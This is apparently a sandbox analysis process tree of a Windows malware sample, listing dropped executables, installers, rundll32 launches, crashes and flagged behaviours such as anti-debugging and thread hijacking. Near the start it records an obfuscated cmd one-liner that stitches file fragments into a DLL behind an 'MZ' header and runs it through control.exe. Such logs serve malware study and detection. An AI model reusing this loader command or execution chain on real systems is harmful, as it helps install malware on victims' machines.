                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                    PID:7840
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                        PID:7052
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                          PID:5536
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                          control ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:5384
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              PID:3228
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                  PID:8068
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    PID:3092
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        taskkill -f /Im "sfx_123_206.exe"
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                        PID:6492
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:7116
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-E6N1P.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-E6N1P.tmp\setup_2.tmp" /SL5="$40292,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:2344
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                          PID:6168
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-1JC93.tmp\setup_2.tmp
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-1JC93.tmp\setup_2.tmp" /SL5="$50100,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                            PID:3984
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-CHH5G.tmp\postback.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-CHH5G.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:5324
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:1060
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:6324
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1168
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                        Fri10720d229511df563.exe
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1628
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 1976
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:6656
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                          Fri10d184202996a0d7f.exe
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                          PID:5152
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:1108
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                            Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:4756
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:4124
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10acd1e0a9e6.exe
                                                                                                                                                                                                                                                                                              Fri10acd1e0a9e6.exe /mixone
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:5136
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:404
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                                Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:1488
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-N765M.tmp\Fri10fcc13ae0125c8.tmp
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-N765M.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201F4,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri10fcc13ae0125c8.exe"
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  PID:5348
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-DPHRM.tmp\Sayma.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-DPHRM.tmp\Sayma.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:5720
                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                      dw20.exe -x -s 2148
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                      PID:5160
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:4540
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A2064A0\Fri105268dda3.exe
                                                                                                                                                                                                                                                                                          Fri105268dda3.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          PID:1292
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 244
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                            PID:5452
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6064
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6468
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6152 -ip 6152
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6920
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3524 -ip 3524
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:912
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5664 -ip 5664
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:2320
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1292 -ip 1292
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:1360
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5136 -ip 5136
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:2272
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:6580
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:6700
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 420
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                PID:2948
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 420
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                PID:6156
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1628 -ip 1628
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:6164
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4796 -ip 4796
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:1428
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6700 -ip 6700
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                              PID:5428
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:6320
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:2204
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:6784
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6172 -ip 6172
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:7008
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:7560
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5696 -ip 5696
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                  PID:7532
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                  PID:7984
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:8068
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 8068 -s 420
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                        PID:7812
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4084 -ip 4084
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:7700
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 8068 -ip 8068
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:2648
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5708 -ip 5708
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:7240
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3540 -ip 3540
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:7288
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 496 -ip 496
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                    PID:6052
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AA7E.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\AA7E.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AA7E.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\AA7E.exe
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                      PID:4724
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B2AD.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B2AD.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                    PID:5168
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B2AD.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B2AD.exe
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:6732
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3156 -ip 3156
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                      PID:5068
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FF1.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FF1.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:2216
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 236
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                          PID:4712
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 1588 -ip 1588
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                        PID:6316
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 2832 -ip 2832
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                        PID:7140
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4114.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4114.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                        PID:4300
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2216 -ip 2216
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                        PID:6128
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6324.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6324.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:7828
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 236
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                            PID:1900
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\76EB.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\76EB.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 240
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                              PID:2184
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\80B0.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\80B0.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:7264
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xWmgRPwJ7t.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\xWmgRPwJ7t.exe"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:6760
